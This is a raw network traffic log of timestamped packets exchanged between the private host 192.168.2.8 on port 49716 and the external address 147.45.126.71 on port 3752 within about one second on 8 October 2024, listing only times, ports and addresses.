Oct 8, 2024 20:52:32.105453968 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.105453968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105468988 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105484009 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105499029 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105509996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105511904 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.105524063 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105537891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105551958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105561018 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.105572939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105591059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105606079 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105618954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105632067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105645895 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105659008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105673075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105701923 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105715036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105730057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105743885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105756998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105773926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105787992 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105801105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105808020 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.105813980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105828047 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105840921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105854034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105868101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105880976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.105933905 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106306076 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106308937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106328011 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106342077 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106353998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106369972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106384039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106396914 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106411934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106426001 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106439114 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106452942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106508970 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106509924 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106509924 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106724024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106738091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106753111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106775999 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106813908 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.106854916 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106868029 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106880903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106895924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106909037 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106921911 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106935978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106956959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106971025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106982946 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.106997967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107075930 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.107081890 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107096910 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107110023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107213974 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.107213974 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.107219934 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107234955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107249975 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107264042 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.107434034 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.190357924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190372944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190388918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190403938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190418959 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190511942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.190556049 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190577984 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190592051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190613985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190620899 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.190629005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190644026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190658092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190670967 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190675974 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.190685987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190701008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190715075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190761089 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190783024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190804005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190815926 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190835953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190849066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190867901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190881968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190895081 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190908909 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190922976 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190952063 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.190965891 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190979958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.190994978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191087008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191098928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191099882 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191112995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191128016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191204071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191217899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191231966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191260099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191263914 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191282034 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191296101 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191310883 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191327095 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191397905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191411018 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191428900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191442966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191457033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191471100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191535950 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191555977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191570997 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191576004 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191584110 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191597939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191658020 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191658020 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191695929 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191713095 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191725969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191740036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191754103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191767931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191782951 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191843033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191857100 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191870928 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191884995 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191896915 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191899061 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191935062 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191947937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.191979885 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191979885 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.191992044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192006111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192020893 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192034960 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192147970 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192156076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192169905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192183971 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192236900 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192251921 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192265987 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192281008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192302942 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192363977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192369938 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192378044 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192398071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192413092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192425966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192426920 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192440033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192456007 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192456961 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192739010 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192755938 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192770004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192785025 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192797899 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192812920 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192826033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192841053 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192842007 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192842007 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192854881 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192881107 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192929029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192929029 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.192960024 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192974091 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.192990065 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193026066 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193039894 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193109989 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193124056 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193137884 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193152905 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193167925 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.193305969 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193320036 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193334103 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193346977 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193367958 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193381071 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193392038 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.193397045 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193442106 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.193489075 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193502903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193519115 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193531990 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.193689108 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.289139986 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289153099 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289169073 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289191008 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289205074 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289218903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289247990 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.289274931 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289413929 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.289454937 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289469004 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289483070 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289494991 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289607048 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289629936 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289643049 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289655924 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289671898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289686918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289701939 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289716005 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289730072 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289742947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289756060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289776087 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289783955 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289797068 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289805889 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289827108 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289839983 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289854050 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289868116 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289890051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289901972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289916039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289928913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289942026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289953947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.289966106 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290036917 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290056944 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290070057 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290076017 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.290081978 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290090084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290096998 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290105104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290112972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290119886 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290127039 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290133953 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290142059 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290153980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290162086 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290321112 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.290627956 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290642023 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290654898 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290668964 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290680885 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290694952 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290709972 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290730000 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.290730000 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.290873051 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290885925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290899038 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290911913 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290925026 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290936947 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290950060 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290961981 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290975094 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.290982962 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.290987968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291007996 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291019917 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291032076 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291045904 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291060925 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291073084 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291088104 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291100979 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291114092 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291126966 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291141033 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291152954 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291166067 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291178942 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291347980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291359901 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291361094 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.291361094 CEST	49716	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:32.291373968 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291392088 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291426897 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291441917 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291479111 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291495085 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291510105 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291522980 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291594028 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291606903 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291620016 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291640043 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291652918 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291666985 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291692019 CEST	3752	49716	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:32.291695118 CEST	49716	3752	192.168.2.8	147.45.126.71
